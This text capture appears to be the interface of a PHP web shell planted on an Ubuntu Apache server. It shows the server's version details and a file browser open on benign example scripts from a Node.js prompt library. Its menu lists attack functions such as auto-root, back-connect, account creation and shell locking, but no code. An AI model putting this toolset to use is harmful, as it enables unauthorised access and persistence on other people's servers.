Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
prompt /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
add-properties.js
597
B
-rw-rw-r--
existing-properties.js
640
B
-rw-rw-r--
history.js
866
B
-rw-rw-r--
nested-properties-prompt.js
703
B
-rw-rw-r--
old-schema.js
652
B
-rw-rw-r--
override-validation.js
1.11
KB
-rw-rw-r--
password.js
609
B
-rw-rw-r--
prompt-override.js
730
B
-rw-rw-r--
property-prompt.js
865
B
-rw-rw-r--
simple-prompt.js
473
B
-rw-rw-r--
yes-or-no-prompt.js
544
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add-properties.js
/* * add-properties.js: Example of how to add properties to an object using prompt. * * (C) 2010, Nodejitsu Inc. * */ var prompt = require('../lib/prompt'); // // Start the prompt // prompt.start(); var obj = { password: 'lamepassword', mindset: 'NY' } // // Log the initial object. // console.log('Initial object to be extended:'); console.dir(obj); // // Add two properties to the empty object: username and email // prompt.addProperties(obj, ['username', 'email'], function (err) { // // Log the results. // console.log('Updated object received:'); console.dir(obj); });
Close